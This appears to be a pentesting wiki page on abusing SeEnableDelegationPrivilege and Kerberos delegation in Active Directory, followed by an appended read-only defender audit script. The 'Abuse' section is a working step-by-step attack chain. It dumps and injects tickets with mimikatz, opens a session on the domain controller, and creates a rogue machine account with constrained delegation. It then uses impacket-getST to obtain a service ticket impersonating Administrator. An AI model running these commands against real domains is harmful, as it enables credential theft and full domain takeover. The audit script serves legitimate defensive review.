SeEnableDelegationPrivilege


With the SeEnableDelegationPrivilege right, you can set Trusted For Delegation on domain objects. If a compromised machine account already has this setting and is therefore a trusted account, it is likely that ticket issuance on behalf of other users via S4U2self is in use. When tickets are issued through a trusted account, the TGT data stays in that account's memory, so a memory dump can yield other users' TGTs and their NT hashes.

Not every domain user can be impersonated: if the user's userAccountControl attribute has ACCOUNT_NOT_DELEGATED set, BloodHound shows "Cannot be delegated" and impersonation is not possible. If a user holding SeEnableDelegationPrivilege also has GenericAll over a single machine account, they can change that machine account's userAccountControl attribute and obtain an ST by impersonating a service through that machine account.

Abuse

# Check whether any object in the domain has Unconstrained Delegation assigned
PowerShell > Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

# Check whether any object in the domain has Constrained Delegation assigned
PowerShell > Get-ADComputer -Filter * -Properties "msDS-AllowedToDelegateTo" | Where-Object { $_."msDS-AllowedToDelegateTo" -ne $null } | Select-Object Name, "msDS-AllowedToDelegateTo"

# Export the TGTs held in memory
mimikatz > sekurlsa::tickets /export

# Load (pass) an exported ticket into the current session
mimikatz > kerberos::ptt C:\Windows\Temp\<Exported Ticket>

# Use the ticket to obtain a shell on the domain controller
PowerShell > Enter-PSSession <Domain Controller>

# Create a new machine account
Kali > impacket-addcomputer -computer-name 'WIKI$' -computer-pass 'Password123!' -dc-host 10.0.2.10 -domain-netbios pentesting.wiki pentesting.wiki/wiki:password123!

# Add the cifs SPN to the Constrained Delegation attribute of the WIKI account
PowerShell > Set-ADComputer -Identity WIKI -Add @{'msDS-AllowedToDelegateTo'=@('cifs/DC01.PENTESTING.WIKI')}

# Enable delegation on the WIKI account (sets the TRUSTED_TO_AUTH_FOR_DELEGATION flag)
PowerShell > Set-ADAccountControl -Identity "WIKI$" -TrustedToAuthForDelegation $True

# List the registered delegations :: PowerShell
PowerShell > Get-ADComputer -Filter * -Properties msDS-AllowedToDelegateTo | Where-Object { $_.'msDS-AllowedToDelegateTo' -ne $null } | Select-Object Name, msDS-AllowedToDelegateTo

# List the registered delegations :: Kali Linux
Kali > impacket-findDelegation pentesting.wiki/<USER:PASS> -dc-ip 10.0.2.10

# Request a service ticket impersonating a domain user (machine account names carry a trailing $)
Kali > impacket-getST -spn 'cifs/DC01.PENTESTING.WIKI' -impersonate Administrator 'pentesting.wiki/WIKI$:Password123!'
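As an added defender's check (this script is not part of the wiki), the following PowerShell audit surfaces the three conditions the technique above depends on: accounts able to delegate, privileged users that are still delegatable, and who holds SeEnableDelegationPrivilege. It assumes the RSAT ActiveDirectory module and a domain-joined session with read access; the GPO GUID is the well-known one for the Default Domain Controllers Policy.

```powershell
# Added audit script, not part of the wiki page: read-only enumeration of delegation
# settings so a defender can spot the conditions this page abuses.
# Assumes the RSAT ActiveDirectory module and a domain-joined session with read access.
Import-Module ActiveDirectory

# userAccountControl bits (from the AD schema)
$TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (what Set-ADAccountControl -TrustedToAuthForDelegation sets)
$NOT_DELEGATED                  = 0x100000   # ACCOUNT_NOT_DELEGATED ("Cannot be delegated" in BloodHound)

# 1. Every account able to delegate: unconstrained, protocol transition, or constrained (msDS-AllowedToDelegateTo).
$filter = '(|(userAccountControl:1.2.840.113556.1.4.803:=524288)' +
          '(userAccountControl:1.2.840.113556.1.4.803:=16777216)(msDS-AllowedToDelegateTo=*))'
$delegators = Get-ADObject -LDAPFilter $filter -Properties userAccountControl, 'msDS-AllowedToDelegateTo', whenChanged |
  Select-Object Name, ObjectClass, whenChanged,
    @{n='Unconstrained';      e={ ($_.userAccountControl -band $TRUSTED_FOR_DELEGATION) -ne 0 }},
    @{n='ProtocolTransition'; e={ ($_.userAccountControl -band $TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0 }},
    @{n='AllowedToDelegateTo';e={ @($_.'msDS-AllowedToDelegateTo') -join ',' }}

# Domain controllers hold unconstrained delegation by design; anything else is a finding to review.
$dcNames = (Get-ADDomainController -Filter *).Name
"`n== Delegation-capable accounts (excluding DCs) =="
$delegators | Where-Object { $dcNames -notcontains $_.Name } | Format-Table -AutoSize

# 2. Privileged users that delegation could still impersonate: no NOT_DELEGATED flag and not in Protected Users.
$protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive -ErrorAction SilentlyContinue).distinguishedName
"`n== Privileged users still delegatable =="
'Domain Admins', 'Enterprise Admins', 'Administrators' |
  ForEach-Object { Get-ADGroupMember -Identity $_ -Recursive } |
  Where-Object { $_.objectClass -eq 'user' } |
  Sort-Object distinguishedName -Unique |
  ForEach-Object { Get-ADUser -Identity $_.distinguishedName -Properties userAccountControl } |
  Where-Object { (($_.userAccountControl -band $NOT_DELEGATED) -eq 0) -and ($protected -notcontains $_.DistinguishedName) } |
  Select-Object SamAccountName, DistinguishedName | Format-Table -AutoSize

# 3. Who holds SeEnableDelegationPrivilege: read the user-rights section of the Default Domain Controllers Policy
#    (well-known GUID) from SYSVOL. If the right is assigned in another GPO, repeat for that GPO's GptTmpl.inf.
$domain = (Get-ADDomain).DNSRoot
$inf = "\\$domain\SYSVOL\$domain\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
"`n== SeEnableDelegationPrivilege holders (Default Domain Controllers Policy) =="
$line = (Select-String -Path $inf -Pattern '^SeEnableDelegationPrivilege\s*=' -ErrorAction SilentlyContinue).Line
if ($line) {
  ($line -split '=')[1].Split(',') | ForEach-Object {
    $sid = $_.Trim().TrimStart('*')
    try { (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value }
    catch { $sid }   # unresolvable SID: report it raw
  }
} else { "no SeEnableDelegationPrivilege entry in this GPO; check other GPOs linked to the Domain Controllers OU" }
```

Accounts listed in section 2 are the ones to protect with ACCOUNT_NOT_DELEGATED or Protected Users membership, and any non-DC entry in section 1 whose whenChanged is recent deserves a look at who modified it.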
